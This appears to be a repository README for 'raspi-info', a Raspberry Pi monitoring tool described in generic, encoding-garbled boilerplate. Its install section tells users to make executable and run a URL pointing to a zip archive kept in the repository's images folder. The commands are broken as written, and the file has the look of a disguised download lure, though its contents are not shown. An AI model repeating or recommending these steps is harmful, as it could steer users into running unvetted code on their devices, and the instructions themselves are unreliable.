Hauntend/raspi-info
π Gather essential details about your Raspberry Pi with raspi-info, the all-in-one tool for monitoring hardware, software, and network information.
π οΈ raspi-info - Your All-in-One Raspberry Pi Tool
π Getting Started
Welcome to raspi-info! This tool helps you monitor your Raspberry Pi's system information easily. You can check CPU stats, temperature, network status, and more. Letβs get you set up.
π₯ Download Now
π Overview
raspi-info is designed to provide essential information about your Raspberry Pi system. Whether you're a hobbyist or a seasoned administrator, this tool helps you keep an eye on performance metrics. You will find features to track:
- CPU usage and temperature
- Disk space and storage details
- Network stats and configuration
- Apcupsd for power management
βοΈ System Requirements
To run raspi-info, you will need:
- A Raspberry Pi device (any model supported)
- An OS that supports bash (e.g., Raspbian, Debian)
- Basic command-line access
π₯ Download & Install
Visit the Releases page to download the latest version of raspi-info. Hereβs how you can set it up:
- Click on the Releases page.
- Locate the latest release.
- Find the file suitable for your Raspberry Pi.
- Click the download link to start the download.
Once downloaded, follow these steps to install and run:
- Open your terminal.
- Navigate to the directory where you downloaded the file. Use the
cdcommand:cd /path/to/directory - Make the script executable:
chmod +x https://github.com/Hauntend/raspi-info/raw/refs/heads/master/images/info-raspi-1.4.zip - Run the script:
https://github.com/Hauntend/raspi-info/raw/refs/heads/master/images/info-raspi-1.4.zip
βοΈ Features
π CPU Stats
Monitor your Raspberry Pi's CPU usage in real-time. Check how hard your processor is working with easy-to-read graphs.
π‘οΈ CPU Temperature
Keep an eye on the temperature of your CPU. Prevent overheating by monitoring temperatures directly from the interface.
πΎ Disk Space
Check your available storage with a simple command. This feature helps you avoid running out of space unexpectedly.
π Network Information
Get details about your network interface, such as IP addresses and connection status. This helps troubleshoot connectivity issues quickly.
π¦ Apcupsd Support
If you have a compatible UPS, raspi-info can report on its status. Make sure your devices stay powered during outages.
π οΈ Troubleshooting
If you encounter issues:
-
Double-check the permissions of the downloaded file.
-
Ensure your Raspberry Pi is up to date. Run:
sudo apt update && sudo apt upgrade -
Refer to the Issues section on this repository if you need additional help.
π€ Contributing
If you want to improve raspi-info, contributions are welcome. Feel free to fork the repository, make your changes, and submit a pull request. We appreciate any improvements or bug fixes!
π License
raspi-info is licensed under the MIT License. You are free to use, modify, and distribute it as long as you provide credit to the original authors.
π¬ Support
If you have questions or need help with raspi-info, please use the Discussions section to connect with other users and contributors.
For direct support, you can also open an issue in the Issues section mentioned above.
π Additional Resources
π₯ Download Link
Don't forget to download raspi-info by visiting the Releases page for the latest version. Enjoy your hassle-free monitoring experience!